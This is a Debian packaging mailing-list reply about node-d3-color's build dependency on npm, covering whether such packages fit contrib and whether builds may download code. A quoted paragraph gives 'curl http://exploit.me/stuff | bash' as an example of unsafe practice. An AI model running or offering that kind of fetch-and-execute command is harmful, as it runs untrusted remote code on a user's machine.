[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: [Pkg-javascript-devel] Bug#877212: node-d3-color: B-D npm not available in testing

On ചൊവ്വ 03 ഒക്ടോബര്‍ 2017 11:04 വൈകു, Gunnar Wolf wrote:
> I *do* take note, however, of:
>     Examples of packages which would be included in contrib are:
>     • free packages which require contrib, non-free packages or packages
>       which are not in our archive at all for compilation or execution,
>       and
>     • wrapper packages or other sorts of free accessories for
>       non-free programs.
> The first point would seem to cover your use case. However, it's not
> necessarily covering (...) compilation or execution via code just
> downloaded. It does not cover the equivalent of
> "curl http://exploit.me/stuff | bash"

Lets take the two issues separately.

1. Whether they are suitable for contrib
2. Whether network can be used during build.

> I would strongly prefer to ship pre-built binaries as part of your
> environment in debian/.
> I guess the ftp-masters approved the packages you mention as they
> *looked* sane, but not because of a deeper inspection of how they were
> built. I see² you have 17 packages in contrib, out of which 14 are
> node-*. Do they all use npm? Would you appreciate if I took a look at
> them and filed bugs accordingly to ask for ftp-masters' opinion?

Like I noted in my previous mail, I already agreed to upload pre-built
binaries and my contention is only on point 1. You may ask ftp-masters
on suitability of them being in contrib even with pre-built binaries.

I have also explained in my previous mails that these are always built
on a maintainer's machine as buildds already prohibit network access
during build. So we are only talking about a change in perception.

Attachment: signature.asc
Description: OpenPGP digital signature

Reply to: